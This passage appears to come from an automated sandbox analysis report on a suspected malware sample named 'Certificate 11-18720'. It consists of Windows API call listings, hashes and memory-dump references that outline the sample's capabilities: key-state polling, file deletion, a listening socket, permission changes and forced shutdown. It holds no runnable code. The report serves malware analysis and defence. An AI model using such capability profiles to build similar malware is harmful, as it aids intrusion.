• Instruction Fuzzy Hash: DD829F71D04219DFCB24CF98C880BEDBBB2BF48314F2585AAD859AB351E7749D85CB90
APIs
• GetLocalTime.KERNEL32(?), ref: 006109DF
• SystemTimeToFileTime.KERNEL32(?,?), ref: 006109EF
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006109FB
• __wsplitpath.LIBCMT ref: 00610A59
• _wcscat.LIBCMT ref: 00610A71
• _wcscat.LIBCMT ref: 00610A83
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00610A98
• SetCurrentDirectoryW.KERNEL32(?), ref: 00610AAC
• SetCurrentDirectoryW.KERNEL32(?), ref: 00610ADE
• SetCurrentDirectoryW.KERNEL32(?), ref: 00610AFF
• _wcscpy.LIBCMT ref: 00610B0B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00610B4A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: 40ed0efab204af4898cf6441819a889c2f144cec81816e235d56e1cdd6df54fc
• Instruction ID: 7243693765faac97b3332b884eaabc4853b823d27ea6e11943ae47960c4d3884
• Opcode Fuzzy Hash: 40ed0efab204af4898cf6441819a889c2f144cec81816e235d56e1cdd6df54fc
• Instruction Fuzzy Hash: 916169765082459FDB10DF60C844E9EB7E9FF89310F08491EF989C7251DB71EA85CB92
APIs
  • Part of subcall function 005FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 005FABD7
  • Part of subcall function 005FABBB: GetLastError.KERNEL32(?,005FA69F,?,?,?), ref: 005FABE1
  • Part of subcall function 005FABBB: GetProcessHeap.KERNEL32(00000008,?,?,005FA69F,?,?,?), ref: 005FABF0
  • Part of subcall function 005FABBB: HeapAlloc.KERNEL32(00000000,?,005FA69F,?,?,?), ref: 005FABF7
  • Part of subcall function 005FABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 005FAC0E
  • Part of subcall function 005FAC56: GetProcessHeap.KERNEL32(00000008,005FA6B5,00000000,00000000,?,005FA6B5,?), ref: 005FAC62
  • Part of subcall function 005FAC56: HeapAlloc.KERNEL32(00000000,?,005FA6B5,?), ref: 005FAC69
  • Part of subcall function 005FAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,005FA6B5,?), ref: 005FAC7A
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005FA6D0
• _memset.LIBCMT ref: 005FA6E5
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005FA704
• GetLengthSid.ADVAPI32(?), ref: 005FA715
• GetAce.ADVAPI32(?,00000000,?), ref: 005FA752
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005FA76E
• GetLengthSid.ADVAPI32(?), ref: 005FA78B
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005FA79A
• HeapAlloc.KERNEL32(00000000), ref: 005FA7A1
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 005FA7C2
• CopySid.ADVAPI32(00000000), ref: 005FA7C9
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005FA7FA
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005FA820
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 005FA834
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
• Opcode ID: 5b64d274fc9308d211d5efcc44177474af26bce77b4a18ae7a3b21acf506bd91
• Instruction ID: 0dd226fcce5cffd439a3d2be8756027061ac798b88cd56925023dbe838dce2e3
• Opcode Fuzzy Hash: 5b64d274fc9308d211d5efcc44177474af26bce77b4a18ae7a3b21acf506bd91
• Instruction Fuzzy Hash: 46514CB590020AABDF11DFA5DC44EFEBBB9FF05340F048129FA15A7291D7789A05CB62
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: f$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$fff f
                                                                                    • API String ID: 0-1889048015
                                                                                    APIs
                                                                                      • Part of subcall function 00606EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00605FA6,?), ref: 00606ED8
                                                                                      • Part of subcall function 006072CB: GetFileAttributesW.KERNEL32(?,00606019), ref: 006072CC
                                                                                    • _wcscat.LIBCMT ref: 00606441
                                                                                    • __wsplitpath.LIBCMT ref: 0060645F
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00606474
                                                                                    • _wcscpy.LIBCMT ref: 006064A3
                                                                                    • _wcscat.LIBCMT ref: 006064B8
                                                                                    • _wcscat.LIBCMT ref: 006064CA
                                                                                    • DeleteFileW.KERNEL32(?), ref: 006064DA
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006064EB
                                                                                    • FindClose.KERNEL32(00000000), ref: 00606506
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 2643075503-1173974218
                                                                                    APIs
                                                                                      • Part of subcall function 00623C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00622BB5,?,?), ref: 00623C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0062328E
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0062332D
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006233C5
                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00623604
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00623611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1240663315-0
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 00602B5F
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00602BE0
                                                                                    • GetKeyState.USER32(000000A0), ref: 00602BFB
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00602C15
                                                                                    • GetKeyState.USER32(000000A1), ref: 00602C2A
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00602C42
                                                                                    • GetKeyState.USER32(00000011), ref: 00602C54
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00602C6C
                                                                                    • GetKeyState.USER32(00000012), ref: 00602C7E
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00602C96
                                                                                    • GetKeyState.USER32(0000005B), ref: 00602CA8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1737998785-0
                                                                                    APIs
                                                                                      • Part of subcall function 005F9ABF: CLSIDFromProgID.OLE32 ref: 005F9ADC
                                                                                      • Part of subcall function 005F9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 005F9AF7
                                                                                      • Part of subcall function 005F9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 005F9B05
                                                                                      • Part of subcall function 005F9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 005F9B15
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0061C235
                                                                                    • _memset.LIBCMT ref: 0061C242
                                                                                    • _memset.LIBCMT ref: 0061C360
                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0061C38C
                                                                                    • CoTaskMemFree.OLE32(?), ref: 0061C397
                                                                                    Strings
                                                                                    • NULL Pointer assignment, xrefs: 0061C3E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                    • String ID: NULL Pointer assignment
                                                                                    • API String ID: 1300414916-2785691316
                                                                                    APIs
                                                                                      • Part of subcall function 005FB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005FB180
                                                                                      • Part of subcall function 005FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005FB1AD
                                                                                      • Part of subcall function 005FB134: GetLastError.KERNEL32 ref: 005FB1BA
                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00607A0F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                    • API String ID: 2234035333-194228
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00618CA8
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00618CB7
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00618CD3
                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00618CE2
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00618CFC
                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00618D10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                    • String ID:
                                                                                    • API String ID: 1279440585-0
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00606554
                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00606564
                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00606583
                                                                                    • __wsplitpath.LIBCMT ref: 006065A7
                                                                                    • _wcscat.LIBCMT ref: 006065BA
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 006065F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                    • String ID:
                                                                                    • API String ID: 1605983538-0
                                                                                    • Opcode ID: 16f4b4ff52d93933fd5c4da8819d54e70ae22b735757d1f816249a32e0a5923c
                                                                                    • Instruction ID: c525273ed89e9afe7f173493e6be49a4712971effbbf0e0595d6a0798df26b93
                                                                                    • Opcode Fuzzy Hash: 16f4b4ff52d93933fd5c4da8819d54e70ae22b735757d1f816249a32e0a5923c
                                                                                    • Instruction Fuzzy Hash: 0321A771D40259ABDB25AFA4CC88FDEBBBDAB49300F5000A5F545D3281E7719F85CB60
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$f
                                                                                    • API String ID: 0-990064628
                                                                                    • Opcode ID: bd8aaa855c782cc9ef62948b5d2985e3090fdca51474ad97c095dee5bae30ee7
                                                                                    • Instruction ID: 59938d19c41d4681107dc17a910b1314ebb844294c23caa8915b3383c0b196ef
                                                                                    • Opcode Fuzzy Hash: bd8aaa855c782cc9ef62948b5d2985e3090fdca51474ad97c095dee5bae30ee7
                                                                                    • Instruction Fuzzy Hash: 0B927C75E0121ACFDF24CF98C884BEDBBB2BB54314F14859AE816AB380D7719D81DB91
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006013DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen
                                                                                    • String ID: ($,2g$<2g$|
                                                                                    • API String ID: 1659193697-3143567505
                                                                                    • Opcode ID: 0fa57469685da109fce56c2145786444a5301bc6dab202c83def8dbf6c82ffc3
                                                                                    • Instruction ID: 6d3c6146364c776c12da6aa33df104a84364546fdd7941107adc731f5bdca152
                                                                                    • Opcode Fuzzy Hash: 0fa57469685da109fce56c2145786444a5301bc6dab202c83def8dbf6c82ffc3
                                                                                    • Instruction Fuzzy Hash: C6323675A407059FCB28CF69C480AAAB7F1FF48310B15C56EE59ADB3A2E770E941CB44
                                                                                    APIs
                                                                                      • Part of subcall function 0061A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0061A84E
                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00619296
                                                                                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 006192B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 4170576061-0
                                                                                    • Opcode ID: 7faec9b3d0455236f23abc2982b421ba54c0b6b544c1555755d82fcb0bdba70c
                                                                                    • Instruction ID: e8335f7f7b5a936574c0570ad1c71e4271d361d20823a7a82cc273da97bb8635
                                                                                    • Opcode Fuzzy Hash: 7faec9b3d0455236f23abc2982b421ba54c0b6b544c1555755d82fcb0bdba70c
                                                                                    • Instruction Fuzzy Hash: 6641E470600501AFDB14AB68C85AF7E7BEEEF84724F04444EF9569B3D2CB749D018B91
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0060EB8A
                                                                                    • _wcscmp.LIBCMT ref: 0060EBBA
                                                                                    • _wcscmp.LIBCMT ref: 0060EBCF
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0060EBE0
                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0060EC0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 2387731787-0
                                                                                    • Opcode ID: 31e527528ab4d87cc28ead1988675d34ac058acd35bb1593f11942135f6b1848
                                                                                    • Instruction ID: 3b3507a7f27dc189971c0ba62c6d7ddd6a735092f1781b1ef94be1505052011f
                                                                                    • Opcode Fuzzy Hash: 31e527528ab4d87cc28ead1988675d34ac058acd35bb1593f11942135f6b1848
                                                                                    • Instruction Fuzzy Hash: 7441CF356006029FD718DF68C490A9AB7E5FF89324F10495EEA6A8B3A1DB32AD40CF51
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                    • String ID:
                                                                                    • API String ID: 292994002-0
                                                                                    • Opcode ID: 16e0998d8b772208afe3ada87c361b91f72502c745631a38c9c9a2b3eb87f209
                                                                                    • Instruction ID: e74eea411ad26a72a88cf7d3720948d61204f4717d0fdc780fe877b4e787efd8
                                                                                    • Opcode Fuzzy Hash: 16e0998d8b772208afe3ada87c361b91f72502c745631a38c9c9a2b3eb87f209
                                                                                    • Instruction Fuzzy Hash: 3F11E6317019226FE7215F16EC48FAF7B9AEF91760F000429F809D7381CF309C128A90
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,005DE014,74DF0AE0,005DDEF1,0065DC38,?,?), ref: 005DE02C
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 005DE03E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                    • API String ID: 2574300362-192647395
                                                                                    • Opcode ID: 0023dd43f57ffcf3671af2a8d4bca116a65f8cb9d49f77b85a7cdb68d40a1634
